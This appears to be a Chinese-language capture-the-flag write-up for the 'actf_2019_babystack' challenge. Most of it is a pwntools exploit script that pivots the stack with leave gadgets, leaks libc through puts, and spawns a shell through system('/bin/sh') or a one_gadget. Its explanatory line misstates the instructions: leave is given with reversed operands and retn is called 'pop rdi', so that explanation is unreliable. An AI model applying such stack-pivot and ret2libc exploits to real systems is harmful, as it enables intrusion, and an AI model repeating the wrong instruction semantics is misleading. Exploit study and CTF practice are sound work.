actf_2019_babystack

步骤

1.例行检查,64位程序,开启了nx保护

在这里插入图片描述

2.64位ida载入

在这里插入图片描述

3.栈迁移主要就是使用的leave和retn这两条指令,两条指令的实质是

1
2
leave:move rbp,rsp;pop rbp
retn:pop rdi

img

4.exp

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
from pwn import*
from LibcSearcher import*

r=process('./ACTF_2019_babystack')
elf=ELF('./ACTF_2019_babystack')
libc=ELF('/lib/x86_64-linux-gnu/libc.so.6')

pop_rdi=0x0000000000400ad3  #ROPgadget --binary ACTF_2019_babystack |grep 'pop rdi'
leave=0x0000000000400a18 #ROPgadget --binary ACTF_2019_babystack |grep 'leave'
main=0x4008F6
ret=0x0000000000400a4f

#gdb.attach(r)
r.recvuntil('How many bytes of your message?')
p=str(0xe0)
r.sendline(p)
r.recvuntil("at ")
s_addr=int(r.recvuntil('\n',drop=True),16)

r.recvuntil('What is the content of your message?')
p='a'*8+p64(pop_rdi)+p64(elf.got['puts'])+p64(elf.plt['puts'])+p64(main)
p=p.ljust(0xd0,'a')
p+=p64(s_addr)+p64(leave)
r.send(p)               #不能用sendline    
#r.recv()
r.recvuntil('Byebye~\n')
puts_addr=u64(r.recv(6).ljust(8,'\x00'))
'''
#利用system
libc_base=puts_addr-libc.sym['puts']
system=libc_base+libc.sym['system']
binsh=libc_base+next(libc.search('/bin/sh'))

r.recvuntil('How many bytes of your message?')
p=str(0xe0)
r.sendline(p)
r.recvuntil("at ")
s_addr=int(r.recvuntil('\n',drop=True),16)

r.recvuntil('What is the content of your message?')
p='a'*8+p64(pop_rdi)+p64(binsh)+p64(ret)+p64(system)+p64(main) #栈平衡
p=p.ljust(0xd0,'a')
#
'''
#利用one_gadget
libc_base=puts_addr-libc.sym['puts']
one_gadget = libc_base + 0x4f3d5   #one_gadget /lib/x86_64-linux-gnu/libc.so.6 打本地和远端不同

r.recvuntil('How many bytes of your message?')
p=str(0xe0)
r.sendline(p)
r.recvuntil("at ")
s_addr=int(r.recvuntil('\n',drop=True),16)

p = 'a'*8 + p64(one_gadget)
p += 'a'*(0xd0-len(p))
#

p+=p64(s_addr)+p64(leave)
r.send(p)
r.interactive()